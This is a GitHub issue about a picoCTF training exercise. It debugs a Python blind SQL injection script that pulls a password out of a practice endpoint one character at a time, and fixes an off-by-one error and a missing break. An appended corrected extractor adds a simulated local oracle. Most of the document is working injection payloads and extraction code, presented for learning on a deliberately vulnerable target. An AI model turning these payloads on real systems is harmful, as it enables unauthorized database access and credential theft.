Fix Bug in the Sql Injection Code #57

Open
JollyFrolics opened this issue Sep 30, 2024 · 0 comments

@JollyFrolics

The blind SQL injection code

import requests
from string import printable

accum = ""
for i in range(40):                 # position handed to substr(); range(40) starts at 0, not 1
  for letter in printable:
    accum += letter                 # append the guess first, roll it back below if it was wrong

    # Boolean-based blind injection: the injected condition is true only when
    # `letter` equals the character at position i of the password for id=1.
    r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
    + letter +"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")

    if 'NOTHING FOUND...' in r.text:
      accum = accum[:-1]            # wrong guess: drop the character again
      print("nope")
    else:
      print(f"We found the character: {letter}")
      # no break here, so the remaining letters are still tried against the same position

print(accum)

loops using range(40). This iterator starts at 0 instead of 1. This causes one extra loop in the problem.

Also, in the else block of the if 'NOTHING FOUND...' in r.text: there is no break, causing substr to be called on the value
of the position we already know.

To illustrate this:
If we ran this code

from string import printable

import requests

accum = ""
for i in range(40):                 # position handed to substr(); starts at 0
    for letter in printable:
        accum += letter             # append the guess, roll back if the server says no

        # Same boolean-based blind injection as above, one character per request.
        r = requests.post(
            "https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
            + letter
            + "'=( select substr(binary password,"
            + str(i)
            + ",1) from pico_blind_injection where id=1 ) and ''= '"
        )

        if "NOTHING FOUND..." in r.text:
            accum = accum[:-1]      # wrong guess: drop the character again
            print(f"nope: {letter} i:{i}")   # debug output: which letter and which position
        else:
            print(f"We found the character: {letter}")
            # still no break, so the same position keeps being probed

print(accum)

This just adds the letter variable to the "nope" we are printing. The result is:
[Screenshot showing how i being 0 causes the first loop to be worthless]

The next problem is that after letter is found the value of substr isn't updated
[Screenshot showing how the value isn't updated]

The solve would be to use range(1, 40) and to add a break after the else block ends.

@JollyFrolics JollyFrolics changed the title Bug in the Sql Injection Code Fix Bug in the Sql Injection Code Oct 2, 2024
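A corrected character-by-character extraction loop, written here as an added example and not code from the issue or from the picoCTF challenge: positions start at 1 (range(1, max_len + 1) covers max_len positions, since SQL substr is 1-indexed), the inner loop breaks on the first matching letter, and the outer loop stops at the first position where nothing matches instead of running to the limit. So that it runs offline, the server is replaced by a constructed local oracle over a made-up SECRET; the http_oracle function, the TARGET URL with its parameters passed via params=, the ALPHABET filtering and the for/else structure are assumptions of this example.

```python
import string

# Constructed stand-in for the password stored in pico_blind_injection (id=1).
# This is NOT the real challenge value; it only lets the extractor run offline.
SECRET = "p1c0CTF{bl1nd_sql}"

# A quote or backslash inside the guessed character would break the injected
# SQL on a real server, so they are left out of the candidate alphabet
# (assumption of this example; the issue's code uses string.printable as-is).
ALPHABET = "".join(c for c in string.printable if c not in "'\\" and not c.isspace())

TARGET = "https://primer.picoctf.org/vuln/web/blindsql.php"


def build_payload(position, letter):
    """Password field value for one yes/no question: is the character at
    `position` (1-indexed, as in SQL substr) equal to `letter`?"""
    return ("' or '" + letter + "'=( select substr(binary password,"
            + str(position) + ",1) from pico_blind_injection where id=1 ) and ''= '")


def local_oracle(position, letter):
    """Simulated server: mirrors what the injected condition evaluates to.
    substr() is 1-indexed and returns '' past the end of the string, so
    position 0 or any position beyond the length never matches."""
    if position < 1 or position > len(SECRET):
        return False
    return SECRET[position - 1] == letter   # `binary` makes the compare case-sensitive


def http_oracle(position, letter):
    """Oracle against the endpoint named in the issue (not exercised offline).
    The page text 'NOTHING FOUND...' marks a false answer, as in the issue."""
    import requests   # imported lazily so the offline demo does not need it installed
    r = requests.post(TARGET, params={"username": "WeDontCare",
                                      "password": build_payload(position, letter)})
    return "NOTHING FOUND..." not in r.text


def extract(oracle, max_len=40, alphabet=ALPHABET):
    """Recover the password one position at a time.
    Positions run from 1 to max_len inclusive; each position stops at the
    first matching letter; a position with no match means the end of the value."""
    accum = ""
    for position in range(1, max_len + 1):
        for letter in alphabet:
            if oracle(position, letter):
                accum += letter
                break               # character for this position is known; move on
        else:
            break                   # no candidate matched: password is shorter than max_len
    return accum


if __name__ == "__main__":
    print(extract(local_oracle))    # prints the constructed SECRET
```

To run it against the real challenge, pass http_oracle instead of local_oracle; each position then costs at most len(ALPHABET) requests rather than always the full alphabet, and the loop ends as soon as substr returns an empty string.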